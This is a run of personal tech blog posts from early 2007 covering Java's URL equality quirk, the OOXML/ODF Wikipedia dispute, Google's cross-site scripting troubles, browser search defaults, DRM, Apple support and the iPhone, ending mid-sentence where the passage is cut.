I just found the post Mr. Gosling - why did you make URL equals suck?!? on programming.reddit.com and just had to share

Okay, I’m totally hacked! java.net.URL class officially sucks! The equals method on this shining example of the JDK API mess actually does a blocking DNS lookup on the host string to resolve to an IP address and then compares the IP addresses rather than the host string. What freakin’ sense does that make?

Simple example:

URL url1 = new URL("http://foo.example.com");
URL url2 = new URL("http://example.com");

Let’s say these map to these IP addresses:

http://foo.example.com => 245.10.10.1
http://example.com => 245.10.10.1

Here’s the scary part:

url1.equals(url2) => true!

That's definitely the best example of code that deserves to be on The Daily WTF I've seen from a standard library. Just thinking about all the code I have in RSS Bandit that tests URLs for equality, it boggles my mind to think a standard library could have such a craptacular implementation of the equals() method.

Anyone have similar examples from other standard libraries (C++, .NET, JDK, Ruby, etc)? I need some bad code to cheer me up after a day that's already had too many meetings. :)


 

Some of you may have seen the recent hubbub related to Microsoft and BlueJ. If you haven't you can get up to speed from articles such as Microsoft copies BlueJ, admits it, then patents it. An update to this story was posted by Dan Fernandez in his blog post entitled Update: Response to BlueJ Patent Issues where he wrote

On Friday, an alert reader emailed me about a new article by Michael Kölling, the creator of BlueJ, about a patent issued by Microsoft for features in Object Test Bench that are comparable to BlueJ's Object Bench. I'll post the full "anatomy of a firedrill" some time later, but for now we can officially say that the patent application was a mistake and one that should not have happened. To fix this, Microsoft will be removing the patent application in question. Our sincere apologies to Michael Kölling and the BlueJ community.

I'm glad this has been handled so quickly. I hope the news of Microsoft withdrawing the patent application spreads as fast and as far as the initial outrage at the news of the patent application being filed. 


 

Categories: Technology

I noticed that the top headline on Techmeme this afternoon is a couple of posts from Robert Scoble complaining that not enough people link to his blog. at first, I was scratching my head at this given that Robert's blog still manages to rank in the top 50 most linked blogs according to the Technorati Top 100 then I saw a post by Jeff Sandquist that made things clearer.

In his post entitled Scoble Intel LinkGate 2007 - Bootstrapping a new business via blogs Jeff Sandquist writes

I can empathize with Robert to a point on this.  I am well aware of how damn hard it is to build an audience.   Robert is tasked with doing this for PodTech a relatively new business and the stakes are high.   Exclusive content like Robert's Intel piece took time and money to produce (flight to Portland, cameras, bandwidth, a crew and more) and needs to show a return.  I can imagine that PodTech looked at a piece like this as a bootstrap for their network.  The hope being that the exclusive piece will get Slashdotted, Digged or high profile tech blogs (Engagdget / Gizmodo) will also follow suit.   The hope is that a few of those viewers will stick around, view other PodTech content and maybe others will subscribe to the feed to return another day.  Building an audience, inch by incch is hard work.  This all takes persistance and time all while you are justifying to your sponsors and leaders your content style and tone.  So when the Intel piece doesn't result in a lot of flow (guess we're still in the eyeball game <img alt=" src="http://www.jeffsandquist.com/smilies/wink.gif">) from the big sites Robert flew off the handle in frustration. 

I believe as this business grows, it is going to get even harder to bootstrap the businesses soley through traditional grass roots/link based marketing.  With the number of blogs and media sites continuing to grow, it will get harder and harder to get links to even exclusive the most content.

From that perspective it now makes sense to me. PodTech hired an A-list blogger in the hopes that he'd bring in lots of traffic due to the popularity of his blog but it looks like that isn't working as much as they like and now Robert is beginning to feel the pressure. I tend to agree with Jeff that perhaps PodTech should look to more than the blog of their A-list blogging employee as their primary source of traffic and buzz. 

This also explains why Robert felt obligated to give a shout out to PodTech when he got listed as one of the Web's Top 25 celebrities instead of basking in the glow of getting such props from the mainstream media. There's probably a lesson here for folks who plan to parlay their blog fame into an endeavor that requires driving eyeballs and capturing an audience.


 

I like the concept of online Q&A sites and I have to say that I've been quite impressed at how successful Yahoo! has been with Yahoo! Answers. Not only did they build a good end user experience but they followed up with heavy cross promotion on their other services, TV ads and getting lots of real-world celebrities to use the service. My favorite questions asked by real-world celebrities thus far

Based on your own family's experience, what do you think we should do to improve health care in America? asked by Hillary Clinton (U.S. Senator and Presidential Candidate)

What should we do to free our planet from terrorism? asked by Dr. APJ Abdul Kalam (President of India)

That's pretty freaking cool. Kudos to the Yahoo! Answers for being able to pull off such a great promotion and build such a successful service in such a short time. 


 

January 26, 2007
@ 02:13 AM

Interesting, it seems Flickr have formalized the notion of partitioning tags into namespaces with their introduction of Machine Tags which are described as

# What are machine tags?

Machine tags are tags that use a special syntax to define extra information
about a tag.

Machine tags have a namespace, a predicate and a value. The namespace defines a class or a facet that a tag belongs to ('geo', 'flickr', etc.) The predicate is name of the property for a namespace ('latitude', 'user', etc.) The value is, well, the value.

Like tags, there are no rules for machine tags beyond the syntax to specify the parts of a machine tag. For example, you could tag a photo with :

* flickr:user=straup

* flora:tree=coniferous

* medium:paint=oil

The XML geek in me can't help but squint at the term "namespaces" and wonder how they plan to avoid naming collisions in a global namespace (e.g. if multiple people choose the same name for a namespace they create) . I guess this is no different from people using the same word to tag an item while meaning totally different things (e.g. "apple", "glass", "light", etc) and folksonomies like Flickr seem to handle this just fine.

Creating facets in tags like this isn't new, del.icio.us has had this for a while and it it looks like a good way to create ways to create hidden tags that the system can use for performing special operations without it being in the user's face.

Now that the two granddaddies of tagging both provide this functionality, I wonder how long it takes for machine tags to wind it's way through all the tagging systems in the various copycat Web 2.0 sites on the Web.


 

OPTION A: Samurai X - Complete

Vote in the comments below. Bonus points if you justify your vote.


 

Categories: Personal

From the blog post entitled Check out what we just added to Windows Live Spaces! on the Windows Live Spaces team's blog we learn

Videos, videos and more videos

You asked for it, we created it!  We’ve built more rich media capabilities into Windows Live Spaces so it’s easier for you to display your favorite videos on Spaces.  You can now embed videos directly into your Spaces blog entries.  Adding a visual element to your blogs can help you tell your story.  

For a long time, Windows Live Spaces has prevented users from embedding videos from video sharing sites like YouTube and MSN Soapbox because it didn't allow users to use object tags in their blog content. However it is now commonplace for users to embed Flash objects in their blog posts and even though there were security concerns, user demand has trumped them and the blogging landscape has changed.

I'm glad Windows Live Spaces now enables this but it does point to an interesting problem for me as a developer on RSS Bandit. Currently, we disable displaying embedded objects in content by default. Has the time come to change that rule? I know I changed my security settings in RSS Bandit so I can watch embedded YouTube on blogs months ago and even had to fix some bugs where it seems were a bit overzealous in blocking ActiveX controls.

It seems enabling ActiveX/Flash and Javascript in your browser are becoming mandatory if you actually want to browse the Web thanks to "Web 2.0".


 

Categories: Windows Live

Earlier this week, Tim Bray wrote a blog post entitled On Linking where he pointed out that it has become quite common place for him to link to the Wikipedia entry for a subject even if there is an official site. He also realizes this is a problem when he writes

Why Not Wikipedia? · But this makes me nervous. I feel like I’m breaking the rules; being able to link to original content, without benefit of intermediaries, is one of the things that defines the Web. More practically, when I and a lot of other people start linking to Wikipedia by default, we boost its search-engine mojo and thus drive a positive-feedback loop, to some extent creating a single point of failure; another of the things that the Web isn’t supposed to have.

I’d be astonished if the Wikipedia suddenly went away. But I wouldn’t be very surprised if it went off the rails somehow: Commercial rapacity, legal issues, or (especially) bad community dynamics, we’ve seen that happen to a whole bunch of once-wonderful Internet resources. If and when it did, all those Wikipedia links I’ve used (396 so far, starting in June 2004) become part of a big problem.

As if on cue, a little bit of hubbub broke out on the Web after Rick Jellife blogged that he'd been approached by Microsoft to help keep some articles about its technology neutral. Lots of folks in the press have jumped all over this and called it an attempt by Microsoft to "astroturf" Wikipedia from the usual suspects on Slashdot to more mainstream news sources like USA Today.

Let's dig a little deeper into the issue and look at the facts as opposed to the sensational headlines. Mike Arrington over at TechCrunch has a good collection of links to the relevant online occurences in his post entitled Battleground Wikipedia which contains the following excerpts

Doug Mahugh at Microsoft freely admitted to doing this in a comment to a Slashdot article on the matter. According to another source, a Microsoft spokesperson also chimed in, saying that they believed the article were heavily written by people at IBM, a rival standard supporter, and that Microsoft had gotten nowhere flagging mistakes to Wikipedia’s volunteer editors. However, the discussion area of the Wikipedia page in question does not show any Microsoft involvement.

Microsoft clearly didn’t feel comfortable making direct changes to article about their technology, and frankly they can’t really be blamed for that. Editing an article about yourself is considered a conflict of interest by many in the Wikipedia community, and people are routinely trashed for doing so.
...
In the words of Deep Jive Interests “if you’re going to astroturf [Wikipedia], do it right!”

I'm trying to figure out how we go from Microsoft having problems flagging mistakes to Wikipedia editors and trying to get the relevant entry updated while not violating Wikipedia's conflict of interest rules to Microsoft is trying to astroturf Wikipedia.

Given that the Wikipedia entry is the first or second result on Google searches for "ooxml" and Office Open XML yet has contained misinformation and outright fabrications about the technology, shouldn't Microsoft be trying to get the article corrected while staying within the rules of Wikipedia?

As an experiment I've updated the Wikipedia entry for TechCrunch with a mention of some of the claims about Mike Arrington's conflicts of interest on the site and references to negative  blog posts but no link to his side of the story. TechCrunch is big enough for Mike not to care about this but what should be his course of action? According to Jimmy Wales and the pundits it seems (i) he can't edit the entry  himself nor (ii) can he solicit others to do so. Instead he needs to write a white paper about his position on conflicts of AND then link to it from the talkback page for his entry.Yeah, I'm sure that's going to get read as much as the Wikipedia entry.

It's sad that if Microsoft had just done what other companies do and had a bunch of employees policing its brand on Wikipedia (see the Forbes article Shillipedia), this would never have made the news. It's unfortunate that this is the reward Microsoft gets for being transparent and open instead of taking the low road. 


 

Categories: Social Software

In response to my recent post entitled ODF vs. OOXML on Wikipedia one of my readers pointed out

Well, many of Weir's points are not about OOXML being a "second", and therefore unnecessary, standard. Many of them, I think, are about how crappy the standard actually is.

Since I don't regularly read Rob Weir's blog this was interesting to me. I wondered why someone who identifies himself as working for IBM on various ODF technical topics would be spending a lot of his time attacking a related standard as opposed to talking about the technology he worked. I assumed my reader was mistaken and decided to subscribe to his feed and see how many of his recent posts were about OOXML. Below is a screenshot of what his feed looks like when I subscribed to it in RSS Bandit a few minutes ago

Of his 24 most recent posts, 16 of them are explicitly about OOXML while 7 of them are about ODF.

Interesting. I wonder why a senior technical guy at IBM is spending more time attacking a technology whose proponents have claimed is not competitive with it instead of talking about the technology he works on? Reading the blogs of Microsoft folks like Raymond Chen, Jensen Harris or Brian Jones you don't see them dedicating two thirds of their blog postings to bash rival products or technologies.

From my perspective as an outsider in this debate it seems to me that OOXML is an overspecified description of an open XML document format that is backwards compatible with the billions of documents produced in Microsoft Office formats over the past decade. On the other hand, ODF is an open XML document format that aims to be a generic format for storing business documents that isn't tied to any one product which still needs some work to do in beefing up the specification in certain areas if interoperability is key.

In an ideal world both of these efforts would be trying to learn from each other. However it seems that for whatever reasons IBM has decided that it would rather that Microsoft failed at its attempt to open up the XML formats behind the most popular office productivity software in the world. How this is a good thing for Microsoft's customers or IBM's is lost on me.

Having a family member who is in politics, I've learned that whenever you see what seems like a religious fundamentalism there usually is a quest for money and/or power behind it. Reading articles such as Reader Beware as ODF News Coverage Increases it seems clear that IBM has a lot of money riding on being first to market with ODF-enabled products while simultaneously encouraging governments to only mandate ODF. The fly in the ointment is that the requirement of most governments is that the document format is open, not that it is ODF. Which explains IBM's unfortunate FUD campaign. 

Usually, I wouldn't care about something like this since this is Big Business and Politics 101, but there was something that Rick Jellife wrote in his post An interesting offer: get paid to contribute to Wikipedia which is excerpted below

So I think there are distinguishing features for OOXML, and one of the more political issues is do we want to encourage and reward MS for taking the step of opening up their file formats, at last?

The last thing I'd personally hate is for this experience to have soured Microsoft from opening up its technologies so I thought I'd throw my hat in the ring at least this once.

PS: It's pretty impressive that a Google search for "ooxml" pulls up a bunch of negative blog posts and the wikipedia article as the first couple of hits. It seems the folks on the Microsoft Office team need to do some SEO to fix that pronto.


 

Categories: Competitors/Web Companies | XML

From the blog post entitled Use Live Search and We'll Donate to Team Seattle and Ninemillion.org on the Live Search team's blog we learn

The Live Search team recently launched two new programs to help children in need, and we would love you to help us out. The good news is that all you have to do to help us is try Live Search on one of our “click for the cause” sites, and each search you do will add more money to Microsoft’s donation.

The two organizations we are working with in these programs are  ninemillion.org and Team Seattle. Ninemillion.org is a United Nations led campaign providing education and sports programs for nine million refugee youth around the world

...

Ninemillion.org - click4thecause.live.com

ninemillion.org kids

Live Search is a global business, so we wanted a way to help kids all over the world who are in need. Supporting Ninemillion.org and their mission to help 9 million refugees really stood out as a great way to make a impact.  Each search at click4thecause.live.com results in a financial donation from Microsoft to provide help with education programs to the refugee kids around the globe. More info on ninemillion.org’s work with these youth can be found at their Windows Live Spaces blog.

In addition to the money raised from the searches, Microsoft is also donating online advertising and editorial space across MSN and microsoft.com to raise awareness of the relief effort.

I'm not one to ask my readers to use our services but in this case I'm making an exception. Please check out http://click4thecause.live.com to learn more about ninemillion.org and perform some searches.

Thanks for your time.


 

Categories: Windows Live

Apple's tech support is a real clusterfuck. What is amazing to me is that I know how bad their tech support is yet their products have been so much better than the competition's that I keep buying Apple devices. Yesterday I was at the Genius Bar at the Apple Store in Tukwila to report a problem with my video iPod. For some reason, my iPod no longer plays sound out of the right side of any headphones plugged into it.

Before complaining about the experience, I should probably point out the one positive thing about the experience was that I could make an appointment online instead of waiting around in the store for a "genius" to become available. I got there a little early and got to marvel at the all-in-one design of the iMacs which blew my mind as someone who spends all his time on Dell PCs and laptops. Now that I can run Windows on a Mac, I may end up buying one of these the next time I have to buy a computer. 

Anyway, back to my tech support woes. When my turn came up, I told the "genius" my problem and he gave me two options.

  1. I can get a used refurbished iPod as a replacement from Apple which would either cost me $200 or $0 (if mine was still under warranty)
  2. I could go online and try an iPod repair sites like iPodResQ which aren't affiliated with Apple at all.

Since my iPod was no longer under warranty and I didn't feel like paying $200 for a used iPod, I decided to go with iPodResQ . While the iPod "genius" was helping me I noticed that the Mac "genius" was also answering some questions from a customer about Apple Boot Camp. The Mac "genius" told the customer to go to Google and search for "Apple Boot Camp" to get information about it.

At this point it seemed to me that Apple Inc. can save itself a lot of money and its customers a lot of time by replacing its Genius Bars with the following FAQ

Q: I have a question about ...
A: Go to Google and type your question.

Q: I have a problem with my iPod
A: Go to iPodResQ

Q: I have a problem with my iMac/Mac Pro/Mac Mini/MacBook
A: Go to MacResQ

It's really a sad testament to the PC industry that despite these negative tech support experiences with Apple products I'd still get a 20-inch iMac in a heartbeat.


 

Categories: Rants

January 22, 2007
@ 09:44 PM

This morning I stumbled upon an interestingly titled post by Rick Jellife which piqued my interest entitled An interesting offer: get paid to contribute to Wikipedia where he writes

I’m not a Microsoft hater at all, its just that I’ve swum in a different stream. Readers of this blog will know that I have differing views on standards to some Microsoft people at least.
...
So I was a little surprised to receive email a couple of days ago from Microsoft saying they wanted to contract someone independent but friendly (me) for a couple of days to provide more balance on Wikipedia concerning ODF/OOXML. I am hardly the poster boy of Microsoft partisanship! Apparently they are frustrated at the amount of spin from some ODF stakeholders on Wikipedia and blogs.

I think I’ll accept it: FUD enrages me and MS certainly are not hiring me to add any pro-MS FUD, just to correct any errors I see.
...
Just scanning quickly the Wikipedia entry I see one example straight away:
The OOXML specification requires conforming implementations to accept and understand various legacy office applications . But the conformance section to the ISO standard (which is only about page four) specifies conformance in terms of being able to accept the grammar, use the standard semantics for the bits you implement, and document where you do something different. The bits you don’t implement are no-one’s business. So that entry is simply wrong. The same myth comes up in the form “You have to implement all 6000 pages or Microsoft will sue you.” Are we idiots?

Now I certainly think there are some good issues to consider with ODF versus OOXML, and it is good that they come out an get discussed. For example, the proposition that “ODF and OOXML are both office document formats: why should there be two standards?” is one that should be discussed. As I have mentioned before on this blog, I think OOXML has attributes that distinguish it: ODF has simply not been designed with the goal of being able to represent all the information possible in an MS Office document; this makes it poorer for archiving but paradoxically may make it better for level-playing-field, inter-organization document interchange. But the archiving community deserves support just as much as the document distribution community. And XHTML is better than both for simple documents. And PDF still has a role. And specific markup trumps all of them, where it is possible. So I think there are distinguishing features for OOXML, and one of the more political issues is do we want to encourage and reward MS for taking the step of opening up their file formats, at last?

I'm glad to hear that Rick Jellife is considering taking this contract. Protecting your brand on Wikipedia, especially against well-funded or organized detractors is unfortunately a full time job and one that really should be performed by an impartial party not a biased one. It's great to see that Microsoft isn't only savvy enough to realize that keeping an eye on Wikipedia entries about itself is important but also is seeking objective 3rd parties to do the policing.

It looks to me that online discussion around XML formats for business documents has significantly detoriorated. When I read posts like Rob Weir's A Foolish Inconsistency and The Vast Blue-Wing Conspiracy or Brian Jones's Passing the OpenXML standard over to ISO it seems clear that rational technical discussion is out the windows and the parties involved are in full mud slinging mode. It reminds me of watching TV during U.S. election years. I'm probably a biased party but I think the "why should we have two XML formats for business documents" line that is being thrown around by IBM is crap. The entire reason for XML's existence is so that we can build different formats that satisfy different needs. After all, no one asks them why the ODF folks had to invent their own format when PDF and [X]HTML already exist. The fact that ODF and OOXML exist yet have different goals is fine. What is important is that they both are non-proprietary, open standards which prevents customers from being locked-in which is what people really want.

And I thought the RSS vs. Atom wars were pointless.

PS: On the issue of Wikipedia now using nofollow links, I kinda prefer Shelley Powers's idea in her post Wikipedia and nofollow that search engines treat Wikipedia specially as an 'instant answer' (MSN speak) or OneBox result (Google speak) instead of including it in the organic search results page. It has earned its place on the Web and should be treated specially including the placement of disclaimers warning Web n00bs that it's information should be taken with a grain of salt.


 

Categories: XML

Danny Thorpe has a blog post entitled Windows Live Contacts Control Shows Online Presence where he writes

This month's rev of the Windows Live Contacts Control adds a new "tile" view that displays the photos of your Windows Live IM contacts in the control, and makes starting an IM session with them a simple one-click operation.  The top part of this screenshot shows the new tile view.  The bottom part is another instance of the contacts control in list view mode.

Windows Live Contacts Control tile and list views

This widget can be embedded on a page and used to enable Windows Live/MSN users to view or otherwise Windows Live Messenger buddies or Hotmail contacts. I've been following the development of this widget since the project started and it is definitely getting interesting.


 

Categories: Windows Live

We are now feature complete for the next release of RSS Bandit and it's time to get the final bits of user testing before we declare the bits golden. You can obtain the installer from RssBandit.1.5.0.5.Jubilee.RC.zip. We've fixed a number of major bugs that were discovered during the beta including crashes related to building the Lucene search index and podcasts being repeatedly downloaded after the first successful download attempt. I'd like to thank all the  people who tried out the beta and gave us feedback. Windows Vista users should be especially happy with this release since is the first version of RSS Bandit (ever) to work on that operating systems with no problems.

The major new features and bug fixes since the last official release (v.1.3.0.42) are listed below. There will be a comprehensive list of bug fixes and new features in the announcement for the final release. New features and bug fixes since the last beta are marked as .

New Features
Major Bug Fixes
 

Categories: RSS Bandit

January 18, 2007
@ 11:34 PM

I've always wondered how mixtape DJs can get away with selling CDs consisting of people rapping over hot beats from popular pop songs without a nod to the original artist or producer. According to the New York Time story With Arrest of DJ Drama, the Law Takes Aim at Mixtapes it looks like they won't be getting away with it anymore. Excerpt below

In the world of hip-hop few music executives have more influence than DJ Drama. His “Gangsta Grillz” compilations have helped define this decade’s Southern rap explosion. He has been instrumental in the careers of rappers like Young Jeezy and Lil Wayne. He appears on the cover of the March issue of the hip-hop magazine XXL, alongside his friend and business partner T.I., the top-selling rapper of 2006. And later this year DJ Drama is scheduled to make his Atlantic Records debut with “Gangsta Grillz: The Album.”
...
Mixtapes are, by definition, unregulated: DJs don’t get permission from record companies, and record companies have traditionally ignored and sometimes bankrolled mixtapes, reasoning that they serve as valuable promotional tools. And rappers have grown increasingly canny at using mixtapes to promote themselves. The career of 50 Cent has a lot to do with his mastery of the mixtape form, and now no serious rapper can afford to be absent from this market for too long.
...
DJ Drama’s mixtapes are often great. He has turned “Gangsta Grillz” into a prestige brand: each is a carefully compiled disc, full of exclusive tracks, devoted to a single rapper who is also the host. Rappers often seem proud to be considered good enough for a “Gangsta Grillz” mixtape. On “Dedication,” the first of his two excellent “Gangsta Grillz” mixtapes, Lil Wayne announces, “I hooked up with dude, now we ’bout to make history.” The compilation showed off Lil Wayne more effectively than his albums ever had, and “Dedication” helped revive his career.

This sucks. I love mixtapes and would hate for the RIAA to cause an end to mixtape series like Gangsta Grillz or G-Unit Radio. What I didn't expect was that Lil Wayne would start talking smack about DJ Drama after he helped resurrect his career though. From the VH1 article, 'Play The Game Fair': Lil Wayne Responds To DJ Drama's Mixtape Bust

"Smarten up," Lil Wayne advised mixtape DJs. "Smarten up."

For the past few years, Wayne has seen his entire career shift thanks to his performance on mixtapes. Street CDs such as his Gangsta Grillz classics The Dedication and The Dedication 2 have catapulted him to the lyrical elite in the minds of fans. Last year, he may have been the MC with the most material on the mixtape circuit.

"It's a bad thing," Wayne said of the Aphilliates' arrests, "but you gotta play the game fair. If you don't play fair, all kind of things can happen. You gotta watch people like DJ Clue, watch people like DJ Khaled. They do it right."

Wow. All I can say to that is Stop Snitching.


 

Categories: Music

January 18, 2007
@ 02:59 PM

I've been spending my free time putting the finishing touches on the next beta of the Jubilee release of RSS Bandit so I've been remiss at blogging and have accumulated a bunch of things to blog about which I never got around to posting. Here is an outpouring of links from my 'to blog' list

  • 20Q.net: The classic game of twenty questions powered by a neural network. It is uncanny how good this game was at guessing what I was thinking about. This is the closest to magic I've seen on the Web.

  • programming.reddit.com: If you are the kind of geek who find Jeff Atwood's blog to be a fun read then this is the meme tracker for you. Light on fluffy A-list geek wankery over the latest from Apple & Google and heavy on programming culture from the trenches.

  • The Story of XMLHTTP: The most complete account of the creation one of the cornerstones of AJAX, I've seen online. I 've actually worked with some of the people mentioned in the story.

  • Zeichick's Take: Remember CUA Compliance? Microsoft Doesn't: The most amusing rant about the new ribbon in Microsoft Office 2007 I've seen yet. My favorite quote, "Microsoft says that the problem was that users couldn't find and use the more obscure features of Word, Excel and the other Office tools. No, that wasn't the problem. The problem was that there were too many features". I guess his solution would have been for Microsoft to cut a bunch of features from Office instead of redesigning the UI. Yeah, right.

  • To DTD or not to DTD: It looks like Netscape is getting ready to break all of the RSS 0.91 feeds on the Web which reference their DTD which is practically all of them. I need to ensure that this doesn't cause problems in RSS Bandit. I like how the Netscape guy tries to blame RSS reader developers for using XML as designed. Another example of how XML schemas in general and DTDs in particular were one of the worst concepts foisted on XML. We should have been trying to make our programming languages as dynamic as XML not make XML as rigid as our programming languages. Maybe we'll have better luck in the JSON era.

PS: If you are an RSS Bandit user then check back this weekend for the final beta. We are now feature complete and should now work just fine on Windows Vista. However some of the podcast-related features had to be scaled back for this release.


 

January 16, 2007
@ 08:23 PM

By now it's common news that Google has been hit by what seems like half a dozen or more cross site scripting security flaws in the past month. If you missed the news, you can read blog posts like More Google security failures and Wow, more Google XSS problems which contain links to some of the stories of recent exploits. The bugs in those blog posts aren't exhaustive, I've seen some blog posts about exploits that don't seem to have hit the mainstream tech blogs such as the one mentioned in the blog post Pending Members - Google Groups XSS Bug [Part 2].

Anyway, the fact that Google is having problems with XSS issues isn't terribly interesting and should be an expected part of the growing pains as they go from a service that doesn't store any user data to one that aims to be the repository of all their user's data. That requires an entirely different approach to security. What I did find interesting was a blog post on the Google Blogoscoped blog entitled On Google Security which stated

Today, it almost seems as if every single product team in the Googleplex has the “power” to accidentally introduce a Google Account risk with an HTML injection hole, or another kind of cross-site scripting issue. An exotic Blogger bug was able to reveal your Google Docs, even if you’re not blogging with Blogger – an improbable Google Base bug was able to reveal your personalized homepage, even when you’ve never worked with Google Base**. I would argue: these things happen, individual developers and developer teams make errors. It’s impossible not to. There are ways to automatically test against HTML injections, but such tools too need to be handled by humans.

The real problem, and solution, might be on the higher level of the system architecture – the way Google integrates its services and handles cookie data. Right now, the Google Office product partly resembles a mighty convenient & long chain... a chain which is only as strong as its weakest link. Is this a trade-off we’ll just have to make with future web apps, or are there ways to improve on the situation... either by users, or those building browsers, or those developing web apps?

Those who ignore history are doomed to repeat it. None of the problems listed are unique to Google. Any portal that provides multiple services that require the user to login is vulnerable to these problems. This includes competing portals like Yahoo!, MSN and AOL. All of these services have had to encounter and protect users against the very same problems Google is having difficulty dealing with today.

It is likely that with time, Google will stumble upon the same set of best practices that are common knowledge amongst its portal competitors who have been in the game a lot longer. Thinking that this is a problem that affects "the future of Web apps" ignores the history of the Web. 

In the meantime, if you are a Web developer at Google, I'd suggest reading Chapter 12 of Writing Secure Code by Michael Howard. After that, take a look at You know about XSS. How about XSRF/CSRF? which happens to use a Google service as an example of Cross Site Request Forgery attack (XSRF).

That which doesn't kill us only makes us stronger. ;)


 

January 16, 2007
@ 05:57 PM

Danny Sullivan over at Search Engine Land has a post entitled comScore: Google Wins Again & IE7 Doesn't Stop Microsoft's Slide where he writes

It's that time again -- search popular stats for last month are coming out. Actually, Hitwise sent me their figures earlier this month but I'm diving in with the comScore figures that just came out. The main real news is despite the Internet Explorer 7 launch, Microsoft's Live continues to show a drop in usage.

What is puzzling to me is that people thought that the release of IE 7 would cause a increase in search share for Microsoft's search engine and a decline in competitors. The fact is that built-in search boxes within the browser encourage people to treat search as a feature of the browser instead of a site they visit. That means that the defaults built into the browser/operating system are important. But what exactly is the default search engine on most PCs running IE 7? I don't have any hard numbers but here's some data from my post about this entitled Competing with Google is Like the War in Iraq which stated

The combination of the proliferation of search toolbars and a new generation of Web browsers with built-in search boxes (e.g. IE 7 and Firefox) have reduced the need for users to actually go to websites to perform a search. This means that it is now very important to be the search engine that is used when a user enters a search directly from their browser. Guess which search engine is the one used by your browser if you
  1. Are you a user of the Firefox browser?
  2. Are you a user of the Opera browser?
  3. Are you a user of IE 7 and have installed Adobe Acrobat?
  4. Are you a user of IE 7 and have installed the Java runtime?
  5. Are you a user of IE 7 and have installed the WinZip archive utility?
  6. Are you using a newly purchased Dell computer?
  7. Are you a user of the Google Toolbar?
Yes, the answer is Google in every case. So even if you are an Internet n00b who hasn't made up their mind about which search engine to choose, there is a large chance that the default search engine you end up using thanks to recent innovations in IE 7 and Firefox will be Google.

If anything, browsers like Firefox and IE 7 make it harder for users to switch from Google not easier because it gets them away from the notion of visiting websites to perform searches and instead they just accept whatever default the browser provides.


 

There's an article in the NY Times entitled Want an iPhone? Beware the iHandcuffs which contains the following excerpt

Even if you are ready to pledge a lifetime commitment to the iPod as your only brand of portable music player or to the iPhone as your only cellphone once it is released, you may find that FairPlay copy protection will, sooner or later, cause you grief. You are always going to have to buy Apple stuff. Forever and ever. Because your iTunes will not play on anyone else’s hardware.

Unlike Apple, Microsoft has been willing to license its copy-protection software to third-party hardware vendors. But copy protection is copy protection: a headache only for the law-abiding.

Microsoft used to promote its PlaysForSure copy-protection standard, but there must have been some difficulty with the “for sure” because the company has dropped it in favor of an entirely new copy-protection standard for its new Zune player, which, incidentally, is incompatible with the old one.

Pity the overly trusting customers who invested earlier in music collections before the Zune arrived. Their music cannot be played on the new Zune because it is locked up by software enforcing the earlier copy-protection standard: PlaysFor(Pretty)Sure — ButNotTheNewStuff.

The name for the umbrella category for copy-protection software is itself an indefensible euphemism: Digital Rights Management. As consumers, the “rights” enjoyed are few. As some wags have said, the initials D.R.M. should really stand for “Digital Restrictions Management.”

It's weird to see the kind of anti-DRM screed that one typically associates with people like Cory Doctorow getting face time in the New York Times. DRM is bad for society and bad for consumers. It's that unfortunate that Microsoft is the company that has made one of the bogey men of anti-DRM activists a reality. As Mini-Microsoft wrote in his blog post The Good Manager, etc, etc, ...

In the meantime, I think a positive-because-it's-so-negative result of Zune is that it added fire to the DRM debate

No longer is it a theoretical problem that buying a lot of DRMed music from a vendor leaves you vulnerable if the DRM becomes unsupported or falls out of favor. Thanks to Zune and its lack of support for PlaysForSure. Now even the New York Times has joined the in the rally against DRM.

I have to agree with Mini-Microsoft, this is one of those things that is so bad that it is actually turns a 180 and will be good for all of us in the long run.


 

Categories: Technology

My sister is paying me a surprise visit this weekend and I decided to look on the Web for ideas for what we could do together this weekend. My initial thoughts were that we'd go to the movies and perhaps check out the Bodies: The Exhibition. I wouldn't to see if I could get a better suggestion on the Web.

My first instinct was to try Seattle - City Search but had to give up when I realized the only events listed for today were either announcements of what DJs would be at local clubs tonight or announcements sales at local stores. Another thing that bugged me is how few ratings there were for events or locations on City Search. This reminds me of a blog post on Search Engine Land entitled Local And The Paradox of Participation which came to a set of incorrect conclusions about a poll that claimed that people are equally likely to post a positive or negative review of an event or location. The incorrect conclusion was that it is a myth that few people are likely to post reviews. Given that locations and events that are attended by thousands of people tend to only have dozens of reviews on almost every review site I've ever seen seems to make this a fact not a myth. The poll only seems to imply that people are willing to share their opinion if prompted which is totally different from someone attending a nightclub or concert then feeling compelled to visit one of umpteen review sites to share their opinion. What is surprising to me is that there doesn't seem to even be a small community of die hard reviewers on City Search which is unlike most review sites I've seen. Just compare Amazon or IMDB which both seem to have a number of reviewers who are on top of certain categories of products.

Anyway, what does this have to do with Google? Well, I went to Rich Skrenta's much vaunted starting point of the Intenet and tried some queries such as "local events", "seattle events" and "events in seattle" with pathetic results. The only useful links in the search results page led me to a couple of event search engines (e.g. NWsource, Upcoming) that were pathetically underpopulated with event information. None of them even had a listing for Bodies: The Exhibition. Lame. 

I tried Google Local which turned out to be redirect to their mapping site. Shouldn't a local search engine be able to find events in my local area? Double lame.

Before you bother pointing it out, I realize that other search engines don't do a much better job either. This seems to point to an opportunity to add a lot of value in what must be a very lucrative search market. I'm surprised that Yahoo! hasn't figured out how to do more with their purchase of Upcoming.org. Then again Yahoo! hasn't figured what to do with any of the Web 2.0 startups they've purchased so maybe that is expecting too much. Maybe Google will purchase Eventful.com and fix this fairly big hole in their search offerings. Somehow I doubt it. .


 

I checked out the official Apple iPhone site especially the screencasts of the phone user interface and ipod capabilities set. As an iPod owner, $500 is worth it just to get my hands on this next generation iPod which makes my Video iPod look old and busted. On the other hand, although the text messaging UI is pretty sweet a cellphone without tactile feedback when pushing its buttons is a pain in the ass especially when the layout of the buttons continually changes. I wouldn't wish that on my worst enemy. Maybe I'm just unusual in the fact that I don't want to be required to look at the cellphone's screen when using it. I pull my phone out of my pocket, unlock it and call the last number dialed often without looking at the screen before putting it to my ear. It's hard to imagine that my muscle memory would ever get used to to doing that without tactile feedback from the phone when navigating its interface. It also hasn't been announced whether the phone will be able to sync with Microsoft Exchange or not. As someone who used his phone to keep on top of the goings on at work while at CES, this is another non-starter.

That said, I have to agree with a lot of the stuff said in the article Macworld: Ten Myths of the Apple iPhone. A lot of the complaints about the iPhone just seem like sour grapes. Me, I'm going to wait until I can get an unlocked iPhone so I don't have to replace my Cingular 3125 or until Apple ships a 6th generation iPod (aka iPhone sans phone features).


 

Categories: Technology

From the Reuters article R&B sales slide alarms music biz we learn

